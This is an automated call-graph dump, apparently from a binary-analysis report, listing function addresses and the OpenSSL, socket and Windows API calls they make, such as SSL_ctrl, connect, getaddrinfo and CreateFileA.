124827->124832 124843 7ffda3789499 124827->124843 124832->124843 124845 7ffda378941b strspn 124832->124845 124973 7ffda3788c80 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124833->124973 124834->124804 124835 7ffda378932b 124972 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124835->124972 124836 7ffda37896ac 124844 7ffda3791830 Concurrency::details::SchedulerProxy::DeleteThis 12 API calls 124836->124844 124854 7ffda3789693 124836->124854 124840 7ffda3789365 124974 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124840->124974 124843->124836 124843->124843 124849 7ffda37894d2 strchr 124843->124849 124844->124854 124847 7ffda3789432 124845->124847 124846 7ffda378981b 124846->124850 124856 7ffda3789849 SSL_set_options 124846->124856 124847->124843 124847->124847 124855 7ffda3789440 strchr 124847->124855 124848 7ffda37897cd SSL_check_private_key 124848->124846 124852 7ffda37897de ERR_get_error 124848->124852 124853 7ffda37894e5 124849->124853 124849->124854 124850->124769 124851 7ffda3793450 67 API calls 124858 7ffda378970b 124851->124858 124989 7ffda3788c80 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124852->124989 124853->124854 124860 7ffda37894f6 _strdup 124853->124860 124854->124846 124854->124848 124854->124851 124855->124843 124857 7ffda3789452 SSL_ctrl 124855->124857 124856->124850 124857->124843 124861 7ffda378946c ERR_get_error 124857->124861 124862 7ffda378973c 124858->124862 124863 7ffda378970f _errno 124858->124863 124865 7ffda3789518 strchr 124860->124865 124866 7ffda3789504 124860->124866 124868 7ffda3789534 124865->124868 124978 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 124866->124978 124880 7ffda3788eb9 124880->124761 124915 7ffda3788164 124912->124915 124917 7ffda3788199 124912->124917 124913 7ffda37881e7 124913->124915 124916 7ffda37881f3 ENGINE_finish ENGINE_free 124913->124916 124914 7ffda37881d7 X509_free 124914->124913 124916->124915 124917->124913 124917->124914 124918->124716 124919->124748 124920->124739 124921->124744 124922->124720 124923->124706 124924->124714 124925->124737 124926->124713 124927->124724 124928->124720 124930 7ffda377660b 124929->124930 124931 7ffda3776607 124929->124931 124932 7ffda3791830 Concurrency::details::SchedulerProxy::DeleteThis 12 API calls 124930->124932 124933 7ffda3796230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 124931->124933 124932->124931 124934 7ffda3776634 124933->124934 124934->124782 124993 7ffda37936a0 124935->124993 124937 7ffda379361c 124938 7ffda3796230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 124937->124938 124940 7ffda3789107 124938->124940 124939 7ffda3793687 _errno 124939->124937 124940->124788 124940->124802 124941 7ffda379365c _errno 124941->124937 124942 7ffda3793667 RtlGetLastNtStatus 124941->124942 124942->124937 124944 7ffda3793674 _errno 124942->124944 124943 7ffda3793649 _errno 124943->124937 124944->124937 124946 7ffda3793523 _errno 124954 7ffda3793486 124946->124954 124948 7ffda37935e7 CloseHandle 124948->124954 124949 7ffda37959c0 37 API calls 124949->124954 124950 7ffda3793594 _errno 124951 7ffda37935bf _errno 124950->124951 124952 7ffda379359f RtlGetLastNtStatus 124950->124952 124951->124954 124952->124951 124953 7ffda37935ac _errno 124952->124953 124953->124954 124954->124937 124954->124939 124954->124941 124954->124943 124954->124946 124954->124948 124954->124949 124954->124950 125011 7ffda3794380 124954->125011 125025 7ffda37937f0 20 API calls Concurrency::details::SchedulerProxy::DeleteThis 124954->125025 124955->124757 124956->124880 124957->124768 124958->124785 124959->124786 124960->124771 124961->124785 124962->124786 125070 7ffda3791db0 _errno 124963->125070 124966->124786 124969->124785 124970->124785 124971->124835 124972->124785 124973->124840 124974->124820 124975->124825 124978->124850 124991->124786 124992->124800 124994 7ffda3794380 29 API calls 124993->124994 124995 7ffda37936d7 124994->124995 124996 7ffda379370d 124995->124996 124997 7ffda37936e0 _errno 124995->124997 125050 7ffda37937f0 20 API calls Concurrency::details::SchedulerProxy::DeleteThis 124996->125050 124998 7ffda37936eb 124997->124998 124999 7ffda3793703 124997->124999 125002 7ffda37937b3 CloseHandle 124998->125002 125026 7ffda37959c0 GetFileAttributesA 124998->125026 125001 7ffda3796230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 124999->125001 125004 7ffda37937ce 125001->125004 125002->124999 125004->124954 125006 7ffda379378e 125006->124999 125006->125002 125007 7ffda3793758 _errno 125008 7ffda3793783 _errno 125007->125008 125009 7ffda3793763 RtlGetLastNtStatus 125007->125009 125008->125006 125009->125008 125054 7ffda3795e40 125011->125054 125013 7ffda37943a0 125014 7ffda37943a4 125013->125014 125015 7ffda37943d7 _wassert 125013->125015 125016 7ffda37943f1 125013->125016 125014->124954 125015->125016 125025->124954 125027 7ffda3795a0a 125026->125027 125028 7ffda37959f1 GetLastError 125026->125028 125030 7ffda3795a28 CreateFileA 125027->125030 125031 7ffda3795a10 _errno 125027->125031 125051 7ffda3795dc0 18 API calls Concurrency::details::SchedulerProxy::DeleteThis 125028->125051 125033 7ffda3795a6e GetLastError 125030->125033 125034 7ffda3795a83 DeviceIoControl 125030->125034 125032 7ffda37959fe 125031->125032 125037 7ffda3796230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 125032->125037 125052 7ffda3795dc0 18 API calls Concurrency::details::SchedulerProxy::DeleteThis 125033->125052 125035 7ffda3795ac0 _errno GetLastError FormatMessageA libintl_gettext __acrt_iob_func 125034->125035 125036 7ffda3795b52 CloseHandle 125034->125036 125053 7ffda3791ab0 14 API calls Concurrency::details::SchedulerProxy::DeleteThis 125035->125053 125041 7ffda3795b65 WideCharToMultiByte 125036->125041 125042 7ffda3795b3a _errno 125036->125042 125040 7ffda3793751 125037->125040 125040->125006 125040->125007 125045 7ffda3795ba7 125041->125045 125046 7ffda3795b97 _errno 125041->125046 125043 7ffda3795a7b 125042->125043 125043->125032 125044 7ffda3795b26 LocalFree CloseHandle 125044->125042 125045->125043 125047 7ffda3795bc5 isalpha 125045->125047 125046->125043 125047->125043 125050->124998 125051->125032 125052->125043 125053->125044 125055 7ffda3795e4d 125054->125055 125056 7ffda3795e54 LoadLibraryExA 125054->125056 125055->125013 125057 7ffda3795e73 GetLastError 125056->125057 125062 7ffda3795e8d 125056->125062 125068 7ffda3795dc0 18 API calls Concurrency::details::SchedulerProxy::DeleteThis 125057->125068 125059 7ffda3795ea0 GetProcAddress 125059->125062 125062->125059 125063 7ffda3795ec3 125062->125063 125063->125013 125071 7ffda379240f 125070->125071 125074 7ffda3791df7 125070->125074 125072 7ffda3796230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 125071->125072 125073 7ffda3791886 125072->125073 125073->124776 125074->125074 125077 7ffda3791e46 125074->125077 125078 7ffda3791ec3 _errno 125074->125078 125075 7ffda3792670 fwrite fwrite Concurrency::details::SchedulerProxy::DeleteThis 125075->125077 125077->125071 125077->125074 125077->125075 125079 7ffda37923fc 125077->125079 125078->125071 125079->125071 125080 7ffda3773bc7 125081 7ffda3773bd6 125080->125081 125082 7ffda3773c68 free 125081->125082 125083 7ffda3773c75 125081->125083 125082->125083 125084 7ffda3773ce3 125083->125084 125161 7ffda3794cf0 17 API calls Concurrency::details::SchedulerProxy::DeleteThis 125083->125161 125085 7ffda3773cea socket 125084->125085 125087 7ffda3773d6b 125085->125087 125088 7ffda3773d06 WSAGetLastError 125085->125088 125142 7ffda37790d0 125087->125142 125090 7ffda3773d20 125088->125090 125091 7ffda3773e0a 125088->125091 125089 7ffda3773cbf 125089->125084 125089->125085 125095 7ffda3773ccd _strdup 125089->125095 125090->125091 125093 7ffda3773d34 125090->125093 125101 7ffda377404b connect 125091->125101 125107 7ffda3773e32 strtol 125091->125107 125113 7ffda3773e5c 125091->125113 125096 7ffda37790d0 25 API calls 125093->125096 125095->125085 125100 7ffda3773d43 125096->125100 125097 7ffda3773dd1 125165 7ffda3793980 ioctlsocket 125097->125165 125098 7ffda3773d7f setsockopt 125098->125097 125102 7ffda3773dae WSAGetLastError 125098->125102 125162 7ffda378c450 21 API calls Concurrency::details::SchedulerProxy::DeleteThis 125100->125162 125106 7ffda3774070 WSAGetLastError 125101->125106 125112 7ffda3773d66 125101->125112 125164 7ffda378c450 21 API calls Concurrency::details::SchedulerProxy::DeleteThis 125102->125164 125104 7ffda3773ddd 125104->125091 125108 7ffda3773de1 WSAGetLastError 125104->125108 125111 7ffda3774081 WSAGetLastError 125106->125111 125106->125112 125107->125113 125114 7ffda3773e4d 125107->125114 125166 7ffda378c450 21 API calls Concurrency::details::SchedulerProxy::DeleteThis 125108->125166 125109 7ffda3773e94 _errno strtol 125118 7ffda3773ec0 _errno 125109->125118 125128 7ffda3773f05 125109->125128 125110 7ffda3773d54 125163 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 125110->125163 125111->125112 125120 7ffda3774092 WSAGetLastError 125111->125120 125125 7ffda3796230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 125112->125125 125113->125101 125113->125109 125113->125128 125168 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 125114->125168 125116 7ffda3773dc8 125167 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 125116->125167 125122 7ffda3773ecf 125118->125122 125118->125128 125120->125112 125126 7ffda37740a3 WSAGetLastError 125120->125126 125122->125128 125133 7ffda3773ee0 isspace 125122->125133 125129 7ffda3774dc9 125125->125129 125174 7ffda3776990 33 API calls Concurrency::details::SchedulerProxy::DeleteThis 125126->125174 125131 7ffda3773f44 WSAGetLastError 125128->125131 125132 7ffda3773fa8 125128->125132 125169 7ffda377a920 31 API calls Concurrency::details::SchedulerProxy::DeleteThis 125128->125169 125170 7ffda377afa0 9 API calls Concurrency::details::SchedulerProxy::DeleteThis 125128->125170 125172 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 125128->125172 125171 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 125131->125171 125135 7ffda3774012 125132->125135 125136 7ffda3773fb5 _errno strtol 125132->125136 125133->125122 125133->125128 125135->125101 125137 7ffda3774014 125136->125137 125138 7ffda3773fda _errno 125136->125138 125137->125101 125173 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 125137->125173 125138->125137 125140 7ffda3773fe5 125138->125140 125140->125101 125140->125135 125141 7ffda3773ff1 isspace 125140->125141 125141->125137 125141->125140 125143 7ffda37790ff 125142->125143 125152 7ffda377914f 125142->125152 125178 7ffda378e2f0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 125143->125178 125145 7ffda377912a 125146 7ffda3782c50 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 125145->125146 125147 7ffda3779136 125146->125147 125179 7ffda378bf90 17 API calls Concurrency::details::SchedulerProxy::DeleteThis 125147->125179 125149 7ffda37791ef 125151 7ffda3782c50 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 125149->125151 125150 7ffda377914a 125155 7ffda3796230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 125150->125155 125153 7ffda37791fb 125151->125153 125152->125149 125156 7ffda37791c7 125152->125156 125180 7ffda378bf90 17 API calls Concurrency::details::SchedulerProxy::DeleteThis 125153->125180 125157 7ffda3773d7a 125155->125157 125175 7ffda3782c50 125156->125175 125157->125097 125157->125098 125161->125089 125162->125110 125163->125112 125164->125116 125165->125104 125166->125116 125167->125091 125168->125113 125169->125128 125170->125128 125171->125128 125172->125128 125173->125135 125174->125112 125181 7ffda3782e10 125175->125181 125178->125145 125179->125150 125180->125150 125182 7ffda3782c5e 125181->125182 125183 7ffda3782e1f GetLastError 125181->125183 125190 7ffda378c3b0 125183->125190 125185 7ffda3782e38 125186 7ffda3782e43 getenv 125185->125186 125187 7ffda3782e6a 125185->125187 125186->125187 125198 7ffda378c420 LeaveCriticalSection 125187->125198 125189 7ffda3782e7d SetLastError 125189->125182 125191 7ffda378c3f6 EnterCriticalSection 125190->125191 125192 7ffda378c3c2 125190->125192 125191->125185 125194 7ffda378c3ce 125192->125194 125195 7ffda378c3e4 125192->125195 125196 7ffda378c3d0 Sleep 125194->125196 125195->125191 125197 7ffda378c3ed InitializeCriticalSection 125195->125197 125196->125195 125196->125196 125197->125191 125198->125189 125199 7ffda33342d0 125200 7ffda33342da 125199->125200 125201 7ffda3334320 ERR_new ERR_set_debug ERR_set_error 125200->125201 125202 7ffda3334355 125200->125202 125279 7ffda3334840 125201->125279 125280 7ffda3332f50 125202->125280 125204 7ffda333436b 125204->125279 125292 7ffda332bff0 125204->125292 125207 7ffda33343a3 CRYPTO_zalloc 125210 7ffda33343c6 CRYPTO_THREAD_lock_new 125207->125210 125207->125279 125208 7ffda333437c ERR_new ERR_set_debug 125209 7ffda3334867 ERR_set_error 125208->125209 125211 7ffda3334873 125209->125211 125212 7ffda33343e1 ERR_new 125210->125212 125213 7ffda3334408 125210->125213 125214 7ffda3333a70 89 API calls 125211->125214 125215 7ffda33343eb ERR_set_debug 125212->125215 125216 7ffda3334410 CRYPTO_strdup 125213->125216 125217 7ffda3334435 OPENSSL_LH_new OPENSSL_LH_set_thunks 125213->125217 125214->125279 125215->125209 125216->125211 125216->125217 125219 7ffda33344bb ERR_new 125217->125219 125220 7ffda33344ca X509_STORE_new 125217->125220 125219->125215 125221 7ffda33344ff 125220->125221 125222 7ffda33344d8 ERR_new ERR_set_debug 125220->125222 125223 7ffda333453d 125221->125223 125224 7ffda3334516 ERR_new ERR_set_debug 125221->125224 125222->125209 125296 7ffda3330eb0 125223->125296 125224->125209 125226 7ffda3334545 125281 7ffda3332f60 125280->125281 125282 7ffda3332f6c 125281->125282 125283 7ffda3332fba 125281->125283 125284 7ffda3332fad 125282->125284 125285 7ffda3332f75 ERR_new ERR_set_debug ERR_set_error 125282->125285 125283->125284 125286 7ffda3332fd9 CRYPTO_THREAD_run_once 125283->125286 125284->125204 125285->125284 125286->125284 125287 7ffda3332ffd 125286->125287 125288 7ffda3333004 CRYPTO_THREAD_run_once 125287->125288 125289 7ffda3333026 125287->125289 125288->125284 125288->125289 125290 7ffda333302d CRYPTO_THREAD_run_once 125289->125290 125291 7ffda333305e 125289->125291 125290->125204 125291->125204 125293 7ffda33aedf0 125292->125293 125294 7ffda332bffa CRYPTO_THREAD_run_once 125293->125294 125295 7ffda332c024 125294->125295 125295->125207 125295->125208 125298 7ffda3330ec9 125296->125298 125300 7ffda3330f24 125298->125300 125427 7ffda333ee40 125298->125427 125299 7ffda333ef20 5 API calls 125299->125300 125300->125299 125301 7ffda3330f65 EVP_MD_get_size 125300->125301 125303 7ffda3330f8b ERR_set_mark EVP_SIGNATURE_fetch 125300->125303 125301->125300 125302 7ffda33313ae 125301->125302 125302->125226 125304 7ffda3330fb2 125303->125304 125305 7ffda3330fc3 EVP_KEYEXCH_fetch 125304->125305 125428 7ffda333ee55 125427->125428 125433 7ffda3353f40 125428->125433 125434 7ffda3353f50 125433->125434 125455 7ffda3336950 125457 7ffda3336965 125455->125457 125456 7ffda3336973 125458 7ffda333699c ERR_new ERR_set_debug ERR_set_error 125456->125458 125466 7ffda33369de 125456->125466 125457->125456 125459 7ffda3336a7a 125457->125459 125460 7ffda3364ecf 125459->125460 125461 7ffda3364f36 125459->125461 125463 7ffda3364f16 125459->125463 125594 7ffda3368fd0 ERR_new ERR_set_debug ERR_vset_error 125460->125594 125595 7ffda3322840 EnterCriticalSection 125461->125595 125467 7ffda3364f1a 125463->125467 125596 7ffda3322840 EnterCriticalSection 125463->125596 125469 7ffda3336a60 125466->125469 125470 7ffda3336a1b ASYNC_get_current_job 125466->125470 125473 7ffda3336a66 125466->125473 125482 7ffda3397b90 125469->125482 125519 7ffda3397970 125469->125519 125556 7ffda33982b3 125469->125556 125470->125469 125471 7ffda3336a25 125470->125471 125593 7ffda333fbe0 9 API calls 125471->125593 125475 7ffda3336a50 125483 7ffda3397b9a 125482->125483 125484 7ffda33982fd ERR_clear_error SetLastError 125483->125484 125508 7ffda3397bc1 125483->125508 125485 7ffda3398316 125484->125485 125487 7ffda339838d 125485->125487 125622 7ffda3335e50 ERR_new ERR_set_debug ERR_set_error 125485->125622 125488 7ffda339845f 125487->125488 125489 7ffda3398412 125487->125489 125487->125508 125518 7ffda33983a4 125487->125518 125493 7ffda3398477 125488->125493 125494 7ffda339846b ERR_new 125488->125494 125489->125493 125497 7ffda339842a ERR_new 125489->125497 125490 7ffda339866e 125505 7ffda339845a 125490->125505 125597 7ffda3398720 125490->125597 125628 7ffda3397ed0 82 API calls 125490->125628 125491 7ffda33985fb 125496 7ffda3398609 ERR_new ERR_set_debug 125491->125496 125499 7ffda339863b ERR_new ERR_set_debug ERR_set_error 125491->125499 125502 7ffda339849b 125493->125502 125503 7ffda339848f ERR_new 125493->125503 125495 7ffda3398434 ERR_set_debug 125494->125495 125623 7ffda3397c10 11 API calls 125495->125623 125627 7ffda3397c10 11 API calls 125496->125627 125497->125495 125499->125505 125506 7ffda33984e1 125502->125506 125507 7ffda33984a4 BUF_MEM_new 125502->125507 125503->125495 125504 7ffda3398535 BUF_MEM_free 125504->125508 125505->125504 125624 7ffda333f340 8 API calls 125506->125624 125509 7ffda33984c0 BUF_MEM_grow 125507->125509 125510 7ffda33984b1 ERR_new 125507->125510 125508->125473 125509->125506 125512 7ffda33984d2 ERR_new 125509->125512 125510->125495 125512->125495 125513 7ffda33984fe 125514 7ffda3398502 ERR_new ERR_set_debug 125513->125514 125516 7ffda339857a 125513->125516 125514->125505 125625 7ffda3397c10 11 API calls 125514->125625 125516->125518 125626 7ffda33a6610 29 API calls 125516->125626 125518->125490 125518->125491 125518->125504 125520 7ffda339797a 125519->125520 125520->125473 125521 7ffda33982fd ERR_clear_error SetLastError 125520->125521 125522 7ffda3398548 125520->125522 125523 7ffda3398316 125521->125523 125522->125473 125525 7ffda339838d 125523->125525 125752 7ffda3335e50 ERR_new ERR_set_debug ERR_set_error 125523->125752 125525->125522 125526 7ffda339845f 125525->125526 125527 7ffda3398412 125525->125527 125555 7ffda33983a4 125525->125555 125530 7ffda3398477 125526->125530 125531 7ffda339846b ERR_new 125526->125531 125527->125530 125534 7ffda339842a ERR_new 125527->125534 125528 7ffda33985fb 125533 7ffda3398609 ERR_new ERR_set_debug 125528->125533 125536 7ffda339863b ERR_new ERR_set_debug ERR_set_error 125528->125536 125541 7ffda339849b 125530->125541 125542 7ffda339848f ERR_new 125530->125542 125532 7ffda3398434 ERR_set_debug 125531->125532 125753 7ffda3397c10 11 API calls 125532->125753 125757 7ffda3397c10 11 API calls 125533->125757 125534->125532 125535 7ffda3398720 117 API calls 125538 7ffda339866e 125535->125538 125539 7ffda339845a 125536->125539 125538->125535 125538->125539 125758 7ffda3397ed0 82 API calls 125538->125758 125543 7ffda3398535 BUF_MEM_free 125539->125543 125544 7ffda33984a4 BUF_MEM_new 125541->125544 125549 7ffda33984e1 125541->125549 125542->125532 125543->125522 125545 7ffda33984c0 BUF_MEM_grow 125544->125545 125546 7ffda33984b1 ERR_new 125544->125546 125548 7ffda33984d2 ERR_new 125545->125548 125545->125549 125546->125532 125548->125532 125754 7ffda333f340 8 API calls 125549->125754 125550 7ffda33984fe 125551 7ffda3398502 ERR_new ERR_set_debug 125550->125551 125553 7ffda339857a 125550->125553 125551->125539 125755 7ffda3397c10 11 API calls 125551->125755 125553->125555 125756 7ffda33a6610 29 API calls 125553->125756 125555->125528 125555->125538 125555->125543 125557 7ffda33982c0 125556->125557 125558 7ffda33982fd ERR_clear_error SetLastError 125557->125558 125559 7ffda3398548 125557->125559 125560 7ffda3398316 125558->125560 125559->125473 125563 7ffda339838d 125560->125563 125759 7ffda3335e50 ERR_new ERR_set_debug ERR_set_error 125560->125759 125562 7ffda33983a4 125566 7ffda33985fb 125562->125566 125576 7ffda339866e 125562->125576 125581 7ffda3398535 BUF_MEM_free 125562->125581 125563->125559 125563->125562 125564 7ffda339845f 125563->125564 125565 7ffda3398412 125563->125565 125568 7ffda3398477 125564->125568 125569 7ffda339846b ERR_new 125564->125569 125565->125568 125572 7ffda339842a ERR_new 125565->125572 125571 7ffda3398609 ERR_new ERR_set_debug 125566->125571 125574 7ffda339863b ERR_new ERR_set_debug ERR_set_error 125566->125574 125579 7ffda339849b 125568->125579 125580 7ffda339848f ERR_new 125568->125580 125570 7ffda3398434 ERR_set_debug 125569->125570 125760 7ffda3397c10 11 API calls 125570->125760 125764 7ffda3397c10 11 API calls 125571->125764 125572->125570 125573 7ffda3398720 117 API calls 125573->125576 125577 7ffda339845a 125574->125577 125576->125573 125576->125577 125765 7ffda3397ed0 82 API calls 125576->125765 125577->125581 125582 7ffda33984e1 125579->125582 125583 7ffda33984a4 BUF_MEM_new 125579->125583 125580->125570 125581->125559 125761 7ffda333f340 8 API calls 125582->125761 125584 7ffda33984c0 BUF_MEM_grow 125583->125584 125585 7ffda33984b1 ERR_new 125583->125585 125584->125582 125587 7ffda33984d2 ERR_new 125584->125587 125585->125570 125587->125570 125588 7ffda33984fe 125589 7ffda3398502 ERR_new ERR_set_debug 125588->125589 125591 7ffda339857a 125588->125591 125589->125577 125762 7ffda3397c10 11 API calls 125589->125762 125591->125562 125763 7ffda33a6610 29 API calls 125591->125763 125593->125475 125594->125463 125611 7ffda339873c 125597->125611 125598 7ffda33987d5 ERR_new ERR_set_debug 125599 7ffda3398b27 125598->125599 125645 7ffda3397c10 11 API calls 125599->125645 125600 7ffda3398af2 125601 7ffda3398b04 ERR_new 125600->125601 125606 7ffda3398a26 125600->125606 125607 7ffda3398b0e ERR_set_debug 125601->125607 125605 7ffda33a2d10 81 API calls 125605->125611 125606->125490 125607->125599 125608 7ffda3398ad9 125644 7ffda33213a0 CRYPTO_free 125608->125644 125610 7ffda3398ae3 ERR_new 125610->125600 125611->125598 125611->125600 125611->125605 125611->125606 125611->125608 125612 7ffda3398ac0 125611->125612 125613 7ffda3398a6b 125611->125613 125629 7ffda33271f0 125611->125629 125638 7ffda33213a0 CRYPTO_free 125611->125638 125639 7ffda33215d0 CRYPTO_free BUF_MEM_grow CRYPTO_free 125611->125639 125640 7ffda3325530 11 API calls 125611->125640 125641 7ffda33a05c0 46 API calls 125611->125641 125643 7ffda33213a0 CRYPTO_free 125612->125643 125642 7ffda33213a0 CRYPTO_free 125613->125642 125618 7ffda3398aca ERR_new 125618->125608 125619 7ffda3398a75 125619->125606 125620 7ffda3398a8b ERR_new 125619->125620 125620->125607 125622->125487 125623->125505 125624->125513 125625->125505 125626->125518 125627->125499 125628->125490 125632 7ffda33271fa 125629->125632 125630 7ffda33a2e03 125646 7ffda3381310 125630->125646 125632->125630 125635 7ffda33a2e9a 125632->125635 125636 7ffda33a2da5 BUF_MEM_grow 125632->125636 125635->125611 125636->125635 125637 7ffda33a2dba memcpy 125636->125637 125637->125630 125638->125611 125639->125611 125640->125611 125641->125611 125642->125619 125643->125618 125644->125610 125645->125606 125649 7ffda338132a 125646->125649 125647 7ffda33aee50 8 API calls 125651 7ffda33818aa 125647->125651 125648 7ffda3381863 ERR_new ERR_set_debug 125652 7ffda3381886 125648->125652 125649->125648 125650 7ffda33813a6 125649->125650 125668 7ffda3381502 125649->125668 125660 7ffda3381400 125650->125660 125695 7ffda3380260 13 API calls 125650->125695 125651->125635 125676 7ffda33267e0 18 API calls 125651->125676 125699 7ffda3397c10 11 API calls 125652->125699 125655 7ffda33813b7 125656 7ffda33813e3 125655->125656 125657 7ffda33813bb ERR_new 125655->125657 125659 7ffda33813f4 ERR_new 125656->125659 125656->125660 125658 7ffda33813c5 ERR_set_debug 125657->125658 125658->125652 125659->125658 125661 7ffda338150f ERR_new ERR_set_debug 125660->125661 125662 7ffda338149d 125660->125662 125664 7ffda33814cd 125660->125664 125660->125668 125661->125652 125696 7ffda3380320 17 API calls 125662->125696 125665 7ffda3381857 ERR_new 125664->125665 125664->125668 125669 7ffda338158d 125664->125669 125666 7ffda338183c ERR_set_debug 125665->125666 125666->125652 125667 7ffda3381832 ERR_new 125667->125666 125668->125647 125669->125667 125669->125668 125670 7ffda33817e0 ERR_new ERR_set_debug 125669->125670 125672 7ffda3381787 125669->125672 125677 7ffda3386a60 125669->125677 125698 7ffda3397c10 11 API calls 125670->125698 125672->125668 125673 7ffda33817a3 ERR_new ERR_set_debug 125672->125673 125676->125635 125678 7ffda3386a6c 125677->125678 125695->125655 125696->125664 125698->125668 125699->125668 125752->125525 125753->125539 125754->125550 125755->125539 125756->125555 125757->125536 125758->125538 125759->125563 125760->125577 125761->125588 125762->125577 125763->125562 125764->125574 125765->125576 125766 7ffda37750d0 125767 7ffda37750ea 125766->125767 125768 7ffda37750d5 125766->125768 125772 7ffda37766f0 125768->125772 125773 7ffda377672a 125772->125773 125774 7ffda3776707 125772->125774 125775 7ffda37763c0 Concurrency::details::SchedulerProxy::DeleteThis 10 API calls 125773->125775 125774->125773 125788 7ffda3782220 6 API calls Concurrency::details::SchedulerProxy::DeleteThis 125774->125788 125777 7ffda377673b 125775->125777 125791 7ffda377e5f0 5 API calls Concurrency::details::SchedulerProxy::DeleteThis 125777->125791 125778 7ffda377671a 125789 7ffda37822a0 83 API calls Concurrency::details::SchedulerProxy::DeleteThis 125778->125789 125781 7ffda377675c 125792 7ffda378bd80 malloc 125781->125792 125782 7ffda3776722 125790 7ffda3782880 fflush 125782->125790 125784 7ffda3776768 125786 7ffda377677a free 125784->125786 125787 7ffda3776787 125784->125787 125786->125787 125788->125778 125789->125782 125790->125773 125791->125781 125792->125784 125793 7ffda37880d0 125794 7ffda378c3b0 Concurrency::details::SchedulerProxy::DeleteThis 3 API calls 125793->125794 125796 7ffda37880e5 125794->125796 125795 7ffda37880e9 125796->125795 125799 7ffda378c420 LeaveCriticalSection 125796->125799 125798 7ffda3788127 125799->125798 125800 7ffda3774218 125801 7ffda3774231 125800->125801 125802 7ffda3774a9a 125801->125802 125803 7ffda377425d 125801->125803 125829 7ffda37748a3 125801->125829 125887 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 125802->125887 125868 7ffda37820a0 125803->125868 125804 7ffda3796230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 125807 7ffda3774dc9 125804->125807 125808 7ffda3774285 125810 7ffda37742e2 125808->125810 125811 7ffda3774a7f 125808->125811 125826 7ffda377428f 125808->125826 125813 7ffda3774434 125810->125813 125814 7ffda37742eb 125810->125814 125886 7ffda3781de0 7 API calls Concurrency::details::SchedulerProxy::DeleteThis 125811->125886 125812 7ffda37749d9 125883 7ffda3781fb0 5 API calls Concurrency::details::SchedulerProxy::DeleteThis 125812->125883 125819 7ffda377443d 125813->125819 125820 7ffda3774a56 125813->125820 125876 7ffda37852a0 58 API calls Concurrency::details::SchedulerProxy::DeleteThis 125814->125876 125821 7ffda37820a0 32 API calls 125819->125821 125885 7ffda3785920 50 API calls Concurrency::details::SchedulerProxy::DeleteThis 125820->125885 125825 7ffda3774456 125821->125825 125822 7ffda37742f5 125822->125826 125841 7ffda37742fd 125822->125841 125824 7ffda37749f6 125824->125826 125827 7ffda3774a1f 125824->125827 125825->125826 125828 7ffda377445e 125825->125828 125826->125829 125889 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 125826->125889 125827->125829 125884 7ffda378c280 free realloc free Concurrency::details::SchedulerProxy::DeleteThis 125827->125884 125878 7ffda3772330 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 125828->125878 125829->125804 125832 7ffda3774475 125832->125829 125879 7ffda3782880 fflush 125832->125879 125834 7ffda3773b13 125836 7ffda3773b83 125834->125836 125837 7ffda37763c0 Concurrency::details::SchedulerProxy::DeleteThis 10 API calls 125834->125837 125835 7ffda377361d free 125855 7ffda377357a 125835->125855 125838 7ffda3773bb2 125836->125838 125839 7ffda3774d8e 125836->125839 125840 7ffda3773b61 125837->125840 125880 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 125838->125880 125888 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 125839->125888 125874 7ffda377ae50 free free free free 125840->125874 125841->125855 125877 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 125841->125877 125842 7ffda3773662 memset 125842->125855 125846 7ffda3773b69 125875 7ffda377e5f0 5 API calls Concurrency::details::SchedulerProxy::DeleteThis 125846->125875 125847 7ffda37736a3 _errno strtol 125847->125838 125851 7ffda37736ce _errno 125847->125851 125850 7ffda3791830 12 API calls Concurrency::details::SchedulerProxy::DeleteThis 125850->125855 125851->125838 125851->125855 125852 7ffda37736f0 isspace 125852->125855 125853 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 125853->125855 125854 7ffda378e100 calloc calloc free getaddrinfo 125854->125855 125855->125829 125855->125834 125855->125835 125855->125838 125855->125842 125855->125847 125855->125850 125855->125852 125855->125853 125855->125854 125857 7ffda3773852 calloc 125855->125857 125858 7ffda377392f 125857->125858 125859 7ffda37748a8 125857->125859 125860 7ffda3773998 125858->125860 125862 7ffda3773940 memcpy 125858->125862 125881 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 125859->125881 125873 7ffda378e290 free free freeaddrinfo 125860->125873 125862->125860 125862->125862 125863 7ffda37748b7 125882 7ffda378e290 free free freeaddrinfo 125863->125882 125866 7ffda37748c4 125866->125829 125867 7ffda37739a5 125867->125834 125869 7ffda37820ad 125868->125869 125870 7ffda377426f 125868->125870 125869->125870 125871 7ffda37820b3 125869->125871 125870->125808 125870->125812 125870->125829 125890 7ffda377e7c0 32 API calls Concurrency::details::SchedulerProxy::DeleteThis 125871->125890 125873->125867 125874->125846 125875->125836 125876->125822 125877->125855 125878->125832 125879->125855 125880->125829 125881->125863 125882->125866 125883->125824 125884->125829 125885->125826 125886->125829 125887->125829 